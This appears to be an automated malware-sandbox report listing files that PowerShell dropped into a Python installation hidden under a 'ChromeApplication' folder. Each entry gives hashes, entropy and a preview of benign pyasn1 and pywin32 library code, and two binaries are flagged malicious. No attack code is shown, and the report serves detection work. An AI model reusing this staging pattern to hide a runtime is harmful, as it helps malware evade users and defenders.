                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import math.import sys..from pyasn1 import error.from pyasn1.codec.ber import eoo.from pyasn1.compat import integer.from pyasn1.type import base.from pyasn1.type import constraint.from pyasn1.type import namedtype.from pyasn1.type import namedval.from pyasn1.type import tag.from pyasn1.type import tagmap..NoValue = base.NoValue.noValue = NoValue()..__all__ = ['Integer', 'Boolean', 'BitString', 'OctetString', 'Null',. 'ObjectIdentifier', 'Real', 'Enumerated',. 'SequenceOfAndSetOfBase', 'SequenceOf', 'SetOf',. 'SequenceAndSetBase', 'Sequence', 'Set', 'Choice', 'Any',. 'NoValue', 'noValue']..# "Simple" ASN.1 types (yet incomplete)...class Integer(base.SimpleAsn1Type):. """Create |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Typ

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\useful.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5284
                                                                                                                                                                                                  Entropy (8bit):4.634060804764904
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:vO+GivMUzElXAlmg5MpiKVcn0ehDJphw2OxfLLGTjux6Ll0XVEVVqP6KZaD0lWoS:l9UUn00DJ/yxTowTXVoqPmSWoTlk
                                                                                                                                                                                                  MD5:E1917FE595D824C50A0A7A31420EB0F1
                                                                                                                                                                                                  SHA1:75A8DFFBA503489D88DA7F4907EE63680111E9B5
                                                                                                                                                                                                  SHA-256:F89EDE8F486A763176F61D79D1DB4D98821C19C30183FCBE9CAA9CA33BE4FB8F
                                                                                                                                                                                                  SHA-512:D82794B3A9698C5B06E408A60DA860802B32C548B3B8D93A6047083940D4EB71D69DA6C9601B0850C0B39161DCA58D2313CCAA82062C6F411A59B21867FA2393
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import datetime..from pyasn1 import error.from pyasn1.type import char.from pyasn1.type import tag.from pyasn1.type import univ..__all__ = ['ObjectDescriptor', 'GeneralizedTime', 'UTCTime']..NoValue = univ.NoValue.noValue = univ.noValue...class ObjectDescriptor(char.GraphicString):. __doc__ = char.GraphicString.__doc__.. #: Default :py:class:`~pyasn1.type.tag.TagSet` object for |ASN.1| objects. tagSet = char.GraphicString.tagSet.tagImplicitly(. tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7). ).. # Optimization for faster codec lookup. typeId = char.GraphicString.getTypeId()...class TimeMixIn(object):.. _yearsDigits = 4. _hasSubsecond = False. _optionalMinutes = False. _shortTZ = False.. class FixedOffset(datetime.tzinfo):. """Fixed offset in minutes east from UTC."

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythoncom.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):139
                                                                                                                                                                                                  Entropy (8bit):4.654604444359773
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SZ+FlJQcZ6MRxJjZuXyDelc/KOnoQjDcVVfGg9n:SZ+FTQcIMjglpOnxX1g9n
                                                                                                                                                                                                  MD5:52BB9E0303D810D33AFB630073561870
                                                                                                                                                                                                  SHA1:8B640F65295E5D25D78DFBAFD039D20580547F54
                                                                                                                                                                                                  SHA-256:1863FC80A555C8EB97C875CDFA0366F624C4E39B0487D84D96536D06371A5A4D
                                                                                                                                                                                                  SHA-512:D4858D11932BF97A5998B76B886FA3774B94FA9DA2953B29349A8F6E494D3BFF5FC93EBF137361A483F077A17AAD0F2B4E65AC5B13844D8D3028431FB2FCAF9B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Magic utility that "redirects" to pythoncomxx.dll.import pywintypes..pywintypes.__import_pywin32_system_module__("pythoncom", globals()).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\Pythonwin.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                                                  Entropy (8bit):5.5834665335727225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:QCRX2oJzD63IB2XjXx8lpyUs8jcdlT8TNrIl08jWf4Mf4MMRt4MtuPn2JbU:QCRX2ocYBSXCyUs8jcdlT9qfP87QPn2Z
                                                                                                                                                                                                  MD5:8707C1C5C09AF9C8EDEB693501D80459
                                                                                                                                                                                                  SHA1:07023271F01FA17252ECE632F9E06B5CFDAE72F4
                                                                                                                                                                                                  SHA-256:1301C55E13B2E3AD11976474A8C8BC544628615391D26E13C8C982948572CBB4
                                                                                                                                                                                                  SHA-512:2880158CFFC0ACC058DD353D636A28E6C777478E8E5BDE65BD7D58012382D785E5E47900A09D80B5EAF6F40A39759E61CF4568F04FDB373F97813745B9E56698
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........CE.."+.."+.."+..Z..."+..I*.."+.W/.."+.W(.."+.W..."+.."*.O"+.W*.."+..W".."+..W..."+..W).."+.Rich."+.........PE..L.../..d.................B...p.......2.......`....@.......................................@....................................................................\...(...T...................H...........@............`...............................text....@.......B.................. ..`.rdata..pD...`...F...F..............@..@.data...|...........................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\dde.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):79872
                                                                                                                                                                                                  Entropy (8bit):6.012195383549612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:eDt5SreqMB+0FLpO+Mqs8jcdx82MjxDnFxhkxDMamn0VH:XeH4mQlvXMjjHkxDMamn0VH
                                                                                                                                                                                                  MD5:FC3C025CE86123910C283BB65D622DB7
                                                                                                                                                                                                  SHA1:A8124727527D35C8716CFBC9AC1756A80D71EAED
                                                                                                                                                                                                  SHA-256:48E2508B3D6B1AD9C3688E5EF7E22A58A678835465A43DA9A91E5B3B9C798072
                                                                                                                                                                                                  SHA-512:3EA998B4C6A8DCD6011F9D1D2D275BD8C348BC54ED9409CF359081CD7EBDBB41E3E521D11E1C6D1A9909E1FA43938633C3757C84C41B5152EC29389B0A84018F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~z..~z..~z..w.2.zz.....zz......|z..j...xz..,...}z..,...rz..,...hz..~z...z..,...{z.....xz......z......z..Rich~z..........................PE..L...(..d...........!.....................................................................@.............................H............P..D....................`......l...T...............................@............................................text...C........................... ..`.rdata...i.......j..................@..@.data...T....0......................@....rsrc...D....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\mfc140u.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5127088
                                                                                                                                                                                                  Entropy (8bit):6.861766335751532
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:bJZczGW8ke6KllNHsyBqGeQVrrNW2XkGMWrGFLOAkGkzdnEVomFHKnPUUdMG:XczGRGKLBZ/YGkGMWKFLOyomFHKnPr1
                                                                                                                                                                                                  MD5:E76B52D11DB435D36453D26C8B446A8F
                                                                                                                                                                                                  SHA1:6E20C17ED973E38D4A3F26CFC020AF05FF9A6EEA
                                                                                                                                                                                                  SHA-256:E422C9366A53536A35E307EF301F08661C28C29B7FCDA1B454333C6A41C6BB21
                                                                                                                                                                                                  SHA-512:486BE0145D5E439D3D9F5191A4A49EA3685619796557CD7A361117C25A279EE7B94A9FF70C4D73ADBE839A6CE508AB15692DDD8FD6EABC3DBEF18B68D6B0C67F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8'..Vt..Vt..VtI.Su..VtI.Qu..VtI.Ru..Vt...t..Vt..Wu..Vt..Ru..Vt..Uu..VtI.Wu..Vt..WtX.Vt..Su..Vt.._u7.Vt..Vu..Vt...t..Vt..Tu..VtRich..Vt................PE..L......a.........."!......3..r......`L......../..............................`N.....M.N...@A............................L.....4...... 5...............N..'....J.|...p.3.8............................a..@.............4.......3......................text.....3.......3................. ..`.data...H.....3.......3.............@....idata..DS....4..T....4.............@..@.didat........5.......4.............@....rsrc........ 5.......4.............@..@.reloc..|.....J......tJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\basictimerapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7718
                                                                                                                                                                                                  Entropy (8bit):4.592237270639104
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BpQF0mSEkAkZaWIXg7MnjUh/DzlibXD+54SWh:BpQF01EkAkYWV7MnAhi
                                                                                                                                                                                                  MD5:DAB1FA8EF5CBB32C53DAAADE0373E944
                                                                                                                                                                                                  SHA1:9454BC395B84842739E17BB8EEAC4B28A411E0D1
                                                                                                                                                                                                  SHA-256:59077C392496D99BF4909EB6FB63E8F377BCDCF9950E87DBC482940F3570034B
                                                                                                                                                                                                  SHA-512:A38349EC5F88D9B03E2E863DE58F1C915A513A69CEF4CDEEAE716F266865C398AC180FFFBBDFB303DB73D96D1E9A1C5D317BE7990042C60CF50674CF2FBC9A5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# basictimerapp - a really simple timer application..# This should be run using the command line:.# pythonwin /app demos\basictimerapp.py.import sys.import time..import timer.import win32api.import win32con.import win32ui.from pywin.framework import app, cmdline, dlgappcore...class TimerAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS). self.timerAppName = appName. self.argOff = 0. if len(self.timerAppName) == 0:. if len(sys.argv) > 1 and sys.argv[1][0] != "/":. self.timerAppName = sys.argv[1]. self.argOff = 1.. def PreDoModal(self):. # ..sys.stderr = sys.stdout. pass.. def ProcessArgs(self, args):. for arg in args:. if arg == "/now":. self.OnOK().. def OnInitDialog(self):. win32ui.SetProfileFileName("pytimer.ini"). self.title = win32ui.GetProfileV

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\customprint.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5955
                                                                                                                                                                                                  Entropy (8bit):4.794297003026542
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:k9oKEUAIAd+zTwGqMhWEtMdJjqsXfFfPHpqhN22Vk20EO/:keDdQ4MUE2jqsXfFfP47TO/
                                                                                                                                                                                                  MD5:313F44AF5BAF16427E808A61EBAE9159
                                                                                                                                                                                                  SHA1:588458E41D82A3E10DB5C7D6432CA7361960A620
                                                                                                                                                                                                  SHA-256:8BAE84415E88C3B9445F20959AA8BD176F55196B56B2BAA029FD71A48C231E03
                                                                                                                                                                                                  SHA-512:F5146BCD14A052B9C4AA818C5ACDD468EB4014A1CC554CD74551C82770D4501E03FE4C3911B10435088F8C631399F870837F3C2311BC7EBB44DA79356A45B547
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of an Application object that has some custom print functionality...# If you desire, you can also run this from inside Pythonwin, in which.# case it will do the demo inside the Pythonwin environment...# This sample was contributed by Roger Burnham...import win32api.import win32con.import win32ui.from pywin.framework import app.from pywin.mfc import afxres, dialog, docview..PRINTDLGORD = 1538.IDC_PRINT_MAG_EDIT = 1010...class PrintDemoTemplate(docview.DocTemplate):. def _SetupSharedMenu_(self):. pass...class PrintDemoView(docview.ScrollView):. def OnInitialUpdate(self):. ret = self._obj_.OnInitialUpdate(). self.colors = {. "Black": (0x00 << 0) + (0x00 << 8) + (0x00 << 16),. "Red": (0xFF << 0) + (0x00 << 8) + (0x00 << 16),. "Green": (0x00 << 0) + (0xFF << 8) + (0x00 << 16),. "Blue": (0x00 << 0) + (0x00 << 8) + (0xFF << 16),. "Cyan": (0x00 << 0) + (0xFF << 8) + (0xFF << 16),. "Magenta": (

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\demoutils.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1449
                                                                                                                                                                                                  Entropy (8bit):4.870913567569013
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1WMpp:zg7RHNYacPSia0LcbsoYY1Axn
                                                                                                                                                                                                  MD5:152D8AE021879EF2FE84E06B833C3674
                                                                                                                                                                                                  SHA1:684FDFC6C9F8383C7239F1509604769DEE545C23
                                                                                                                                                                                                  SHA-256:051E9274A22C04483C2B500E679A0485657A49419E2EBC7957E5CDA9D3081D27
                                                                                                                                                                                                  SHA-512:47DCBFFFEFB9A9098FA6B053FEF2BF3E4829E4AA38BDA685E12A140C1F7F7EA2EA217AE9841AFB7078099CFF78EDA9E185A7432BD9FCD18FE1F9B5EA745AEA6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\dlgappdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1392
                                                                                                                                                                                                  Entropy (8bit):4.736697406546076
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JE/qQMkkaaTgagdmVAurDZSpAaegADHvkCzCjYTXE7HWr3jJPi7VLKypX:K/qNkzacaggJHZSpSg+kCzXkoMJLHh
                                                                                                                                                                                                  MD5:4DDD10BD9A61F61210C5C4B081D3FB30
                                                                                                                                                                                                  SHA1:4FE9FEF8A41E4A970E8DA111C74474D29667112C
                                                                                                                                                                                                  SHA-256:B7CFCC0A1D3CE27A08E5842FD13CC4CF19D5B8C0F4DB814572F480D9B0B55EEB
                                                                                                                                                                                                  SHA-512:694C82C10F1C92DC9A1E1063F7EB5A2E1B6EFAEE8FBE159E6B5B1FBBFC891954398A8CEA807AFD8796B0D6E3CFEBF2D463255DEF4F9E649C8596B873150995B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# dlgappdemo - a demo of a dialog application..# This is a demonstration of both a custom "application" module,.# and a Python program in a dialog box..#.# NOTE: You CAN NOT import this module from either PythonWin or Python..# This module must be specified on the commandline to PythonWin only..# eg, PythonWin /app dlgappdemo.py..import sys..import win32ui.from pywin.framework import app, dlgappcore...class TestDialogApp(dlgappcore.DialogApp):. def CreateDialog(self):. return TestAppDialog()...class TestAppDialog(dlgappcore.AppDialog):. def __init__(self):. self.edit = None. dlgappcore.AppDialog.__init__(self, win32ui.IDD_LARGE_EDIT).. def OnInitDialog(self):. self.SetWindowText("Test dialog application"). self.edit = self.GetDlgItem(win32ui.IDC_EDIT1). print("Hello from Python"). print("args are:", end=" "). for arg in sys.argv:. print(arg). return 1.. def PreDoModal(self):. sys.stdout = sys.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\dojobapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1514
                                                                                                                                                                                                  Entropy (8bit):4.945406162781541
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:xnC/FCkAXwIRImPSHdA56ZgAKRHWS9HvYrVzysaD74+UKGrgMhr0AKAwjNWpX:GMkmS9DZghR9xYrVHaHJU4MhA9DWh
                                                                                                                                                                                                  MD5:3E856FE847A2C367C3877120AFDA3263
                                                                                                                                                                                                  SHA1:D3209422FEAFA6379D68D2903F80E335917D5B4C
                                                                                                                                                                                                  SHA-256:4CA762DDEFE6B2B8AB613571DEE6B698CAD21464BCDF8334A9F60813A38F599B
                                                                                                                                                                                                  SHA-512:0196C8A6AB7824116E5948D548E1B31B4D21DF9F8BF3971F7C67FCA61557A5B84FE7F73251E8E8319C89093385CFED3A9A73308B62361AD2BC2333FF0658FD2A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# dojobapp - do a job, show the result in a dialog, and exit..#.# Very simple - faily minimal dialog based app..#.# This should be run using the command line:.# pythonwin /app demos\dojobapp.py...import win32api.import win32con.import win32ui.from pywin.framework import app, dlgappcore...class DoJobAppDialog(dlgappcore.AppDialog):. softspace = 1.. def __init__(self, appName=""):. self.appName = appName. dlgappcore.AppDialog.__init__(self, win32ui.IDD_GENERAL_STATUS).. def PreDoModal(self):. pass.. def ProcessArgs(self, args):. pass.. def OnInitDialog(self):. self.SetWindowText(self.appName). butCancel = self.GetDlgItem(win32con.IDCANCEL). butCancel.ShowWindow(win32con.SW_HIDE). p1 = self.GetDlgItem(win32ui.IDC_PROMPT1). p2 = self.GetDlgItem(win32ui.IDC_PROMPT2).. # Do something here!.. p1.SetWindowText("Hello there"). p2.SetWindowText("from the demo").. def OnDestroy(self, msg):.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\app\helloapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1626
                                                                                                                                                                                                  Entropy (8bit):4.791008026710751
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Q8ZkoKG8Cyk9sPY2rtqkTAN5pAwT9AXSgXktAabXYHF4tkhahyNghbx8V/UK9wZU:Qp4ykOk5pTuhzazY2tkhswghbNrY
                                                                                                                                                                                                  MD5:7C7C396C6E867204696DA73D48BBBC20
                                                                                                                                                                                                  SHA1:49E9550CF67F18C0F0C748513F0201E8BEC5102C
                                                                                                                                                                                                  SHA-256:8A7EA09735358CB953592F59DEB8343A070DC670B890E23FA3B106ACF71F3C4B
                                                                                                                                                                                                  SHA-512:A9162E777365CE49DBE784A2AB141C85FA6FBC0126FB0667929289CC1091E13503744DA86E477FFA9C6E9CEC3C5259433B24D451309D1B239B6388452E4440D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:##.## helloapp.py.##.##.## A nice, small 'hello world' Pythonwin application..## NOT an MDI application - just a single, normal, top-level window..##.## MUST be run with the command line "pythonwin.exe /app helloapp.py".## (or if you are really keen, rename "pythonwin.exe" to something else, then.## using MSVC or similar, edit the string section in the .EXE to name this file).##.## Originally by Willy Heineman <wheineman@uconect.net>...import win32con.import win32ui.from pywin.mfc import afxres, dialog, window.from pywin.mfc.thread import WinApp...# The main frame..# Does almost nothing at all - doesnt even create a child window!.class HelloWindow(window.Wnd):. def __init__(self):. # The window.Wnd ctor creates a Window object, and places it in. # self._obj_. Note the window object exists, but the window itself. # does not!. window.Wnd.__init__(self, win32ui.CreateWnd()).. # Now we ask the window object to create the window itself.. self._o

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\cmdserver.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3081
                                                                                                                                                                                                  Entropy (8bit):4.569496612186034
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:s9hGduwsgSUORQjLlGW5LPJuB8fh/bEvNXZpi835aWt5S8AZ1lFn:s9W3sgS9KPLhBwVXm835o8A/n
                                                                                                                                                                                                  MD5:839F37CE522EA5F143D5CDF218C7F924
                                                                                                                                                                                                  SHA1:80DB27F6CA8E178642235DCB60701724ECC6CBCF
                                                                                                                                                                                                  SHA-256:BC4E723F913CD75D7A2F6764951E6FF1B8B3ECAEB42B4A0712EE7248D3FCEE43
                                                                                                                                                                                                  SHA-512:38D9864FD58B7F5D0EFDFEE07DC5ECFDB10423A27D82DE429B612F30CFD70654FD28E8E878DB0352E0980B9D7C40D5FF70A5F2EA8F86BBA6F5D2973D5E2D4C8C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# cmdserver.py..# Demo code that is not Pythonwin related, but too good to throw away.....import _thread.import sys.import traceback..import win32api.from pywin.framework import winout...class ThreadWriter:. "Assign an instance to sys.stdout for per-thread printing objects - Courtesy Guido!".. def __init__(self):. "Constructor -- initialize the table of writers". self.writers = {}. self.origStdOut = None.. def register(self, writer):. "Register the writer for the current thread". self.writers[_thread.get_ident()] = writer. if self.origStdOut is None:. self.origStdOut = sys.stdout. sys.stdout = self.. def unregister(self):. "Remove the writer for the current thread, if any". try:. del self.writers[_thread.get_ident()]. except KeyError:. pass. if len(self.writers) == 0:. sys.stdout = self.origStdOut. self.origStdOut = None.. def getwriter(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\createwin.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2507
                                                                                                                                                                                                  Entropy (8bit):4.762840106777906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:0bf1d4PcR5nzuRT+hTQ89d+OmCTqAT1h+Ziyi48ZqFVyhFoRiV1tWVVChFoR+Lc0:0r1d4PcDzud+hTQ89gOmpp8ZOiV1tWD0
                                                                                                                                                                                                  MD5:EC4B22954C3BA2A557C8C581BA450C19
                                                                                                                                                                                                  SHA1:C0302FF926737CD773CE5153589F91AF165313FE
                                                                                                                                                                                                  SHA-256:5BCF0283E79FD93F828479F6BFA0A25E235B44505B76C839B370DFFA9F24E9E6
                                                                                                                                                                                                  SHA-512:6913B55CBA1453B278C142090F69838F163859C8A17D4CC6151FF82621746799B2DE18D8A948D6C0C332CEDAE0E5A8816E79314B022AF2315730D47AF88930FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# Window creation example.#.# .This example creates a minimal "control" that just fills in its.# .window with red. To make your own control, subclass Control and.# .write your own OnPaint() method. See PyCWnd.HookMessage for what.# .the parameters to OnPaint are..#..import win32api.import win32con.import win32ui.from pywin.mfc import dialog, window...class Control(window.Wnd):. """Generic control class""".. def __init__(self):. window.Wnd.__init__(self, win32ui.CreateWnd()).. def OnPaint(self):. dc, paintStruct = self.BeginPaint(). self.DoPaint(dc). self.EndPaint(paintStruct).. def DoPaint(self, dc): # Override this!. pass...class RedBox(Control):. def DoPaint(self, dc):. dc.FillSolidRect(self.GetClientRect(), win32api.RGB(255, 0, 0))...class RedBoxWithPie(RedBox):. def DoPaint(self, dc):. RedBox.DoPaint(self, dc). r = self.GetClientRect(). dc.Pie(r[0], r[1], r[2], r[3], 0, 0, r[2], r[3] // 2)...def M

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\demoutils.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1494
                                                                                                                                                                                                  Entropy (8bit):4.882251681504472
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Pbg7AU1OuFkM/mpDbOXIacP8iSig1FZa4Qcbs53mVQ7Y1AsI1W6OTpp:zg7RHNYacPSia0LcbsoYY1Amn
                                                                                                                                                                                                  MD5:CCA77E5A4F4DEEA9BEEC7DB407318C2E
                                                                                                                                                                                                  SHA1:4E50484EECAF7DA6D9EF279D153AA2A47B203A4C
                                                                                                                                                                                                  SHA-256:276A4BFD2D9CCDE4AAA7323DD51B98E3E39F3C6C962E560814B19E56441C8AA0
                                                                                                                                                                                                  SHA-512:D9702D4F855D81420B319AE1E11DEBCCFA344940F642FFA7808AF5E74336FC31E9A3892690BDC3B9386DA70BDF73D259FB703FA3E7E8AE509B19A79FBAB3C20E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Utilities for the demos..import sys..import win32api.import win32con.import win32ui..NotScriptMsg = """\.This demo program is not designed to be run as a Script, but is.probably used by some other test program. Please try another demo.."""..NeedGUIMsg = """\.This demo program can only be run from inside of Pythonwin..You must start Pythonwin, and select 'Run' from the toolbar or File menu."""...NeedAppMsg = """\.This demo program is a 'Pythonwin Application'...It is more demo code than an example of Pythonwin's capabilities...To run it, you must execute the command:.pythonwin.exe /app "%s"..Would you like to execute it now?."""...def NotAScript():. import win32ui.. win32ui.MessageBox(NotScriptMsg, "Demos")...def NeedGoodGUI():. from pywin.framework.app import HaveGoodGUI.. rc = HaveGoodGUI(). if not rc:. win32ui.MessageBox(NeedGUIMsg, "Demos"). return rc...def NeedApp():. import win32ui.. rc = win32ui.MessageBox(NeedAppMsg % sys.argv[0], "Demos", win32

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\Demos\dibdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2289
                                                                                                                                                                                                  Entropy (8bit):4.621424310687628
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:szs/T58IAcztK4sopSDyaJNED3JAGpOremEPASzeRWGrLB2PNQMUieei2tfFHYRE:4sb58IfpK4RAyaJNkJnjUrl2PtHf4Mpn
                                                                                                                                                                                                  MD5:48B4583263FD5DA31269422D35BD686B
                                                                                                                                                                                                  SHA1:4B530A24EB31F9596E9270940743BAE2EE2288D3
